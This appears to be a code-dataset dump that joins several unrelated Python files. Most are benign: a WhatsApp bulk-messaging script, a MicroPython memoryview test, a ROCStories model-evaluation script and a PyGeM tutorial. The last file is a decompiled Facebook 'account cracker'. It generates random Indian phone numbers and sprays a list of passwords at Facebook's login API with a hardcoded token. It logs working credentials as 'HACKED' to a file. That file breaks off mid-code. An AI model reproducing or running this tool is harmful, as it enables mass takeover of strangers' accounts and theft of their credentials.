phone = '+' + phone
return phone
def get_numbers_from_file(file_name, file_extension):
if file_extension == 'csv':
df = pd.read_csv(file_name)
else:
df = pd.read_excel(file_name)
df.columns = df.columns.str.upper()
columns = df.columns.to_list()
phone_column = input('Name of the phone column: ').upper()
while phone_column not in columns:
warning_print(f'There is no column "{phone_column}" in the file. Try again.')
print(f'Columns found in your file:\n{columns}\n')
phone_column = input('Name of the phone column: ').upper()
print()
country_code = input('Sometimes there are numbers without the country code.\nInform a number to '
'be used as default for the country code or press enter to skip: ')
phones = df[phone_column].dropna().apply(format_phone, country_code=country_code).to_list()
return phones
def get_message():
message = input('Message:\n')
while len(message) < 3:
warning_print('You need to type at least 3 characters in your message')
message = input('Message:\n')
print('Are you sure you want to send this message to every phone?\n'
f'"{message}"')
confirm = input('1 to confirm, 0 to type the message again: ')
while confirm not in ['0', '1']:
confirm = input('1 to confirm, 0 to type the message again: ')
confirm = int(confirm) # Only converted to int here to prevent typing alphabetic values in input
if not confirm:
return get_message()
else:
return message
def send_message(phones, message, verbose=False):
while len(phones) >= 1:
hour = dt.now().time().hour
minute = dt.now().time().minute + 2
if verbose:
print(f'Sending message to {phones[0]}...', end=' ')
try: # In case the there is no Whatsapp associated with the number
kit.sendwhatmsg(phone_no=phones[0], message=message, time_hour=hour, time_min=minute, wait_time=10)
sleep(5)
pyautogui.hotkey('ctrl', 'w')
print('Sent!')
except Exception:
print(f'An error has occurred and the message was not sent to {phones[0]}')
pass
del phones[0]
if __name__ == '__main__':
print('--- Whatsapp Automatic Messenger ---')
print('Welcome!')
print('*Before you start, make sure you are logged in https://web.whatsapp.com/\n')
file, file_extension = get_file()
numbers = get_numbers_from_file(file_name=file, file_extension=file_extension)
print(f'Your message will be sent to these following numbers:\n{numbers}')
print()
message = get_message()
print(message)
send_message(phones=numbers, message=message, verbose=True)
print('Finish!')
| StarcoderdataPython |
3253510 | <filename>ogip_spectra/__init__.py
from .ogip_spectrum_dataset import *
from .io_ogip import *
from .models import *
__all__ = [
"StandardOGIPDataset",
"StandardOGIPDatasetReader",
"XspecSpectralModel"
]
| StarcoderdataPython |
1606026 | # memoryview.init()
try:
memoryview.init
except:
print("SKIP")
raise SystemExit
buf = b"12345"
m = memoryview(buf, 1, 3)
print(list(m))
m.init(buf, -1, 100)
print(list(m))
m.init(buf, 200, -1)
print(list(m))
| StarcoderdataPython |
155502 | <reponame>egonrian/google-research
# coding=utf-8
# Copyright 2020 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Outputs the overall validation accuracy on the 2016 and 2018 validation sets.
Also outputs accuracy on train set and train-style valid set.
"""
import collections
import csv
import os
import re
import time
from absl import app
from absl import flags
from absl import logging
import gin
import gin.tf
import models
import rocstories_sentence_embeddings
import tensorflow.compat.v2 as tf
import tensorflow_datasets.public_api as tfds
import utils
gfile = tf.io.gfile
FLAGS = flags.FLAGS
flags.DEFINE_string('base_dir', '/tmp/model',
'Base directory containing checkpoints and .gin config.')
flags.DEFINE_string('checkpoint_name', None,
'Specific checkpoint to run one-time eval on. If set, '
'state of FLAGS.continuous is ignored.')
flags.DEFINE_string('output_dir', None,
'Directory in which to save evaluation results.')
flags.DEFINE_bool('continuous', False,
'If True, infintely loops over base_dir looking for new '
'checkpoints. If False, only loops once.')
flags.DEFINE_bool('sharded_eval', False,
'If True, break the dataset into shards and perform eval '
'separately on each. This is intended to be used to be able '
'to compute error bounds on accuracies.')
flags.DEFINE_float('timeout', 9600, 'If greater than 0, time out after this '
'many seconds.')
flags.DEFINE_string('data_dir', None, 'Where to look for TFDS datasets.')
tf.enable_v2_behavior()
METRICS_TO_SAVE = [
# Acc of predicting 5th sentence out of 2000 from valid set.
'valid_nolabel_acc',
# Acc of predicting 5th sentence out of 2000 from train set.
'train_subset_acc',
'valid_spring2016_acc', # Acc on 2016 Story Cloze task.
'valid_winter2018_acc', # Acc on 2018 Story Cloze task.
]
@gin.configurable('dataset')
def prepare_datasets(dataset_name=gin.REQUIRED,
shuffle_input_sentences=False,
num_eval_examples=2000,
batch_size=32):
"""Create batched, properly-formatted datasets from the TFDS datasets.
Args:
dataset_name: Name of TFDS dataset.
shuffle_input_sentences: Not used during evaluation, but arg still needed
for gin compatibility.
num_eval_examples: Number of examples to use during evaluation. For the
nolabel evaluation, this is also the number of distractors we choose
between.
batch_size: Batch size.
Returns:
A dictionary mapping from the dataset split to a Dataset object.
"""
del shuffle_input_sentences
splits_to_load = {
'valid_nolabel': 'train[:2%]',
'train_nolabel': 'train[2%:4%]',
'valid2018': rocstories_sentence_embeddings.VALIDATION_2018,
'valid2016': rocstories_sentence_embeddings.VALIDATION_2016}
datasets = tfds.load(
dataset_name,
data_dir=FLAGS.data_dir,
split=splits_to_load,
download=False)
emb_matrices = {}
valid_nolabel_ds = utils.build_train_style_dataset(
datasets['valid_nolabel'], batch_size, False,
num_examples=num_eval_examples, is_training=False)
datasets['valid_nolabel'], emb_matrices['valid_nolabel'] = valid_nolabel_ds
train_nolabel_ds = utils.build_train_style_dataset(
datasets['train_nolabel'], batch_size, False,
num_examples=num_eval_examples, is_training=False)
datasets['train_nolabel'], emb_matrices['train_nolabel'] = train_nolabel_ds
# Convert official evaluation datasets to validation data format. There are no
# embedding matrices involved here since the task has only two possible next
# sentences to pick between for each example. Ignore num_eval_examples and use
# the full datasets for these.
datasets['valid2018'] = utils.build_validation_dataset(
datasets['valid2018'])
datasets['valid2016'] = utils.build_validation_dataset(
datasets['valid2016'])
return datasets, emb_matrices
def eval_single_checkpoint(
ckpt_name, output_path, model, datasets, embedding_matrices):
"""Runs quantitative evaluation on a single checkpoint."""
if gfile.exists(output_path):
logging.info('Skipping already exists: "%s"', output_path)
return
metrics = model.create_metrics()
logging.info('Evaluating: "%s"', ckpt_name)
utils.do_evaluation(model, metrics, datasets, embedding_matrices)
# This code assumed the checkpoint name contains the epoch and step in the
# following format.
path_search = re.search(r'ep(\w+)_step(\w+)', ckpt_name)
epoch = int(path_search.group(1))
step = int(path_search.group(2))
to_write = collections.OrderedDict()
to_write['checkpoint'] = ckpt_name
to_write['epoch'] = epoch
to_write['step'] = step
for metric in metrics.values():
if metric.name in METRICS_TO_SAVE:
tf.summary.scalar(metric.name, metric.result(), step=step)
to_write[metric.name] = metric.result().numpy()
metric.reset_states()
# Save the results to a text file.
with gfile.GFile(output_path, 'w') as f:
writer = csv.DictWriter(f, fieldnames=to_write.keys())
writer.writeheader()
writer.writerow(to_write)
def do_eval(checkpoint_paths, eval_dir, datasets,
embedding_matrices, sharded_eval=False):
"""Runs quantitative eval for each checkpoint in list."""
num_input_sentences = tf.compat.v1.data.get_output_shapes(
datasets['valid2018'])[0][1]
embedding_dim = tf.compat.v1.data.get_output_shapes(
datasets['valid2018'])[0][2]
for checkpoint_path in sorted(checkpoint_paths):
checkpoint_name = os.path.splitext(os.path.basename(checkpoint_path))[0]
logging.info('Processing checkpoint %s', checkpoint_name)
model = models.build_model(
num_input_sentences=num_input_sentences,
embedding_dim=embedding_dim)
checkpoint = tf.train.Checkpoint(model=model)
result = checkpoint.restore(checkpoint_path).expect_partial()
result.assert_nontrivial_match()
if sharded_eval:
num_shards = 10
for i in range(num_shards):
sharded_datasets = {
name: ds.shard(num_shards, i) for name, ds in datasets.items()
}
output_path = os.path.join(
eval_dir, '%s_metrics_shard.%02d.csv' % (checkpoint_name, i))
eval_single_checkpoint(
checkpoint_name, output_path, model,
sharded_datasets, embedding_matrices)
else:
eval_path = os.path.join(eval_dir, '%s_metrics.csv' % checkpoint_name)
eval_single_checkpoint(
checkpoint_name, eval_path, model, datasets, embedding_matrices)
def create_single_results_file(eval_dir):
"""Merges quantitative result files for each checkpoint into a single file."""
header = ''
to_save = []
for fpath in gfile.glob(os.path.join(eval_dir, '*metrics*.csv')):
if 'all_metrics' not in fpath:
with gfile.GFile(fpath, 'r') as f:
header = next(f)
to_save.append(next(f))
if to_save:
merged_metrics_file_path = os.path.join(eval_dir, 'all_metrics.csv')
with gfile.GFile(merged_metrics_file_path, 'w') as f:
f.write(header)
for data_line in to_save:
f.write(data_line)
def run_eval():
"""Evaluate the ROCSTories next-sentence prediction model."""
base_dir = FLAGS.base_dir
if FLAGS.output_dir:
eval_dir = FLAGS.output_dir
else:
eval_dir = os.path.join(base_dir, 'eval')
gfile.makedirs(eval_dir)
datasets, embedding_matrices = prepare_datasets()
if FLAGS.checkpoint_name is not None:
logging.info('Evaluating single checkpoint: %s', FLAGS.checkpoint_name)
checkpoint_paths = [os.path.join(base_dir, FLAGS.checkpoint_name)]
do_eval(checkpoint_paths, eval_dir, datasets,
embedding_matrices, FLAGS.sharded_eval)
elif not FLAGS.continuous:
logging.info('Evaluating all checkpoints currently in %s', base_dir)
checkpoint_paths = gfile.glob(os.path.join(base_dir, '*ckpt*.index'))
checkpoint_paths = [p.replace('.index', '') for p in checkpoint_paths]
do_eval(checkpoint_paths, eval_dir, datasets,
embedding_matrices, FLAGS.sharded_eval)
create_single_results_file(eval_dir)
else:
logging.info('Continuous evaluation in %s', base_dir)
checkpoint_iter = tf.train.checkpoints_iterator(
base_dir, timeout=FLAGS.timeout)
summary_writer = tf.summary.create_file_writer(
os.path.join(base_dir, 'summaries_eval'))
with summary_writer.as_default():
for checkpoint_path in checkpoint_iter:
do_eval([checkpoint_path], eval_dir, datasets,
embedding_matrices, FLAGS.sharded_eval)
# Save a file with the results from all the checkpoints
create_single_results_file(eval_dir)
logging.info('Results written to %s', eval_dir)
def main(argv):
del argv
# Load gin.config settings stored in model directory. It is possible to run
# this script concurrently with the train script. In this case, wait for the
# train script to start up and actually write out a gin config file.
# Wait 10 minutes (periodically checking for file existence) before giving up.
gin_config_path = os.path.join(FLAGS.base_dir, 'config.gin')
num_tries = 0
while not gfile.exists(gin_config_path):
num_tries += 1
if num_tries >= 10:
raise ValueError('Could not find config.gin in "%s"' % FLAGS.base_dir)
time.sleep(60)
gin.parse_config_file(gin_config_path, skip_unknown=True)
gin.finalize()
run_eval()
if __name__ == '__main__':
app.run(main)
| StarcoderdataPython |
3361984 | <filename>examples/tutorial_1_stl.py
#!/usr/bin/env python
# coding: utf-8
r"""Tutorial 1 STL example"""
import pygem as pg
from pygem.utils import write_bounding_box
# Parameters that DO modify the shape
params = pg.params.FFDParameters()
params.read_parameters(filename='./tutorial_1_stl/parameters_test_ffd_sphere.prm')
# Create VTK files to compare the undeformed and deformed lattice in Paraview
write_bounding_box(params,
'./tutorial_1_stl/params.vtk',
write_deformed=False)
write_bounding_box(params,
'./tutorial_1_stl/params_deformed.vtk',
write_deformed=True)
# The params print themselves nicely
print(params)
# Parameters that DO NOT modify the shape
params_null = pg.params.FFDParameters()
params_null.read_parameters(filename='./tutorial_1_stl/null.prm')
# Read the STL file
stl_handler = pg.stlhandler.StlHandler()
mesh_points = stl_handler.parse('./tutorial_1_stl/test_sphere.stl')
# Display the unmodified sphere in 2 possible ways
stl_handler.plot(plot_file='./tutorial_1_stl/test_sphere.stl')
stl_handler.show(show_file='./tutorial_1_stl/test_sphere.stl')
# Apply the freeform transformation that does not change anything
free_form = pg.freeform.FFD(params_null, mesh_points)
free_form.perform()
new_mesh_points = free_form.modified_mesh_points
stl_handler.write(new_mesh_points, './tutorial_1_stl/test_sphere_null.stl')
stl_handler.plot(plot_file='./tutorial_1_stl/test_sphere_null.stl')
# Apply the freeform transformation that modifies the shape
free_form = pg.freeform.FFD(params, mesh_points)
free_form.perform()
new_mesh_points = free_form.modified_mesh_points
stl_handler.write(new_mesh_points, './tutorial_1_stl/test_sphere_mod.stl')
# Display the modified sphere in 2 possible ways
stl_handler.plot(plot_file='./tutorial_1_stl/test_sphere_mod.stl')
stl_handler.show(show_file='./tutorial_1_stl/test_sphere_mod.stl')
| StarcoderdataPython |
1798608 | <filename>bind/pypi_2.py<gh_stars>100-1000
# Decompiled by HTR-TECH | <NAME>
# Github : https://github.com/htr-tech
#---------------------------------------
# Source File : a.py
# Time : Wed Sep 9 04:27:21 2020
#---------------------------------------
# uncompyle6 version 3.7.4
# Python bytecode 2.7
# Decompiled from: Python 2.7.16 (default, Oct 10 2019, 22:02:15)
# [GCC 8.3.0]
# Embedded file name: <tahm1d>
import os, sys, time, datetime, random, hashlib, re, threading, json, urllib, cookielib, getpass
os.system('rm -rf .txt')
for n in range(98969):
nmbr = random.randint(1111111, 9999999)
sys.stdout = open('.txt', 'a')
print nmbr
sys.stdout.flush()
try:
import requests
except ImportError:
os.system('pip2 install requests')
try:
import mechanize
except ImportError:
os.system('pip2 install mechanize')
time.sleep(1)
os.system('python2 .README.md')
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
br.addheaders = [('user-agent', 'Dalvik/1.6.0 (Linux; U; Android 4.4.2; NX55 Build/KOT5506) [FBAN/FB4A;FBAV/106.0.0.26.68;FBBV/45904160;FBDM/{density=3.0,width=1080,height=1920};FBLC/it_IT;FBRV/45904160;FBCR/PosteMobile;FBMF/asus;FBBD/asus;FBPN/com.facebook.katana;FBDV/ASUS_Z00AD;FBSV/5.0;FBOP/1;FBCA/x86:armeabi-v7a;]')]
def exb():
print '[!] Exit'
os.sys.exit()
def psb(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.03)
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(3.0 / 200)
def t():
time.sleep(1)
def cb():
os.system('clear')
logo = "\n\x1b[1;91m ______ \x1b[1;95m _____ __ __)\x1b[1;92m ______\n \x1b[1;91m (, / )\x1b[1;97m (, / (, /| / \x1b[1;92m (, / )\n \x1b[1;91m /---( \x1b[1;93m / / | / \x1b[1;92m / /\n\x1b[1;91m ) / ____)\x1b[1;94m___/__ ) / |/ \x1b[1;92m _/___ /_\n\x1b[1;91m(_/ ( (__\x1b[1;96m / (_/ ' \x1b[1;92m (_/___ / \n\x1b[1;90m AUTOMATIC ACCOUNT CRACKER BY \x1b[1;96mBOTOL BABA\n\x1b[1;97m--------------------------------------------------\n\x1b[1;95m\n AUTHOR : <NAME>\n FACEBOOK : FACEBOOK.COM/THEMEHTAN\n YOUTUBE : YOUTUBE.COM/MASTERTRICK1\n GITHUB : GITHUB.COM/BOTOLMEHEDI\n\x1b[1;32m\n--------------------------------------------------\n "
back = 0
successful = []
cpb = []
oks = []
id = []
def babaindseven():
os.system('clear')
print logo
print 'CRACK ONLY 7 DIGITS HACKABLE ACCOUNTS'
print
jalan('\x1b[1;91m [1] \x1b[1;93mSTART CRACK')
print
jalan('\x1b[1;92m [2] UPDATE TOOL')
print
jalan('\x1b[1;96m [3] BACK TO HOME')
print
jalan('\x1b[1;97m [0] EXIT')
print 50 * '-'
action()
def action():
global cpb
global oks
bch = raw_input('\n ===> ')
if bch == '':
print '[!] Fill in correctly'
action()
elif bch == '1':
os.system('clear')
print logo
print
try:
c = raw_input('TYPE ANY 3 DIGIT NUMBER \n\n \x1b[1;93m TYPE ANY CODE FROM 954 TO 997 : ')
k = '+91'
idlist = '.txt'
for line in open(idlist, 'r').readlines():
id.append(line.strip())
except IOError:
print '[!] File Not Found'
raw_input('\n[ Back ]')
babaindseven()
elif bch == '2':
os.system('clear')
os.system('pip2 install --upgrade babaindseven')
os.system('clear')
print logo
print
psb('7 DIGIT INDIAN CRACKER UPDATED SUCCESSFULLY')
time.sleep(2)
os.system('python2 .README.md')
elif bch == '3':
os.system('python2 .README.md')
elif bch == '0':
exb()
else:
print '[!] Fill in correctly'
action()
xxx = str(len(id))
psb('[\xe2\x9c\x93] TOTAL NUMBERS: ' + xxx)
time.sleep(0.5)
psb('[\xe2\x9c\x93] PLEASE WAIT, PROCESS IS RUNNING ...')
time.sleep(0.5)
psb('[!] TO STOP THIS PROCESS PRESS Ctrl THEN z')
time.sleep(0.5)
print 50 * '-'
print
def main(arg):
user = arg
try:
os.mkdir('save')
except OSError:
pass
try:
pass1 = <PASSWORD>
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD> + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass1 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass1 + '\n')
okb.close()
oks.append(c + user + pass1)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass1 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass1 + '\n')
cps.close()
cpb.append(c + user + pass1)
else:
pass2 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=<PASSWORD>&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass2 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass2 + '\n')
okb.close()
oks.append(c + user + pass2)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass2 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass2 + '\n')
cps.close()
cpb.append(c + user + pass2)
else:
pass3 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD> + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass3 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass3 + '\n')
okb.close()
oks.append(c + user + pass3)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass3 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass3 + '\n')
cps.close()
cpb.append(c + user + pass3)
else:
pass4 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD> + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass4 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass4 + '\n')
okb.close()
oks.append(c + user + pass4)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass4 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass4 + '\n')
cps.close()
cpb.append(c + user + pass4)
pass5 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + pass5 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass5 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass5 + '\n')
okb.close()
oks.append(c + user + pass5)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass5 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass5 + '\n')
cps.close()
cpb.append(c + user + pass5)
else:
pass6 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD> + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass6 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass6 + '\n')
okb.close()
oks.append(c + user + pass6)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass6 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass6 + '\n')
cps.close()
cpb.append(c + user + pass6)
else:
pass7 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD> + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass7 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass7 + '\n')
okb.close()
oks.append(c + user + pass7)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass7 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass7 + '\n')
cps.close()
cpb.append(c + user + pass7)
else:
pass8 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + pass8 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass8 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass8 + '\n')
okb.close()
oks.append(c + user + pass8)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass8 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass8 + '\n')
cps.close()
cpb.append(c + user + pass8)
pass9 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD>9 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass9 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass9 + '\n')
okb.close()
oks.append(c + user + pass9)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass9 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass9 + '\n')
cps.close()
cpb.append(c + user + pass9)
else:
pass10 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD> + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass10 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass10 + '\n')
okb.close()
oks.append(c + user + pass10)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass10 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass10 + '\n')
cps.close()
cpb.append(c + user + pass10)
else:
pass11 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=<PASSWORD>&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD>1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass11 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass11 + '\n')
okb.close()
oks.append(c + user + pass11)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass11 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass11 + '\n')
cps.close()
cpb.append(c + user + pass11)
else:
pass12 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD> + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass12 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass12 + '\n')
okb.close()
oks.append(c + user + pass12)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass12 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass12 + '\n')
cps.close()
cpb.append(c + user + pass12)
pass13 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD> + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass13 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass13 + '\n')
okb.close()
oks.append(c + user + pass13)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass13 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass13 + '\n')
cps.close()
cpb.append(c + user + pass13)
else:
pass14 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD>14 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass14 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
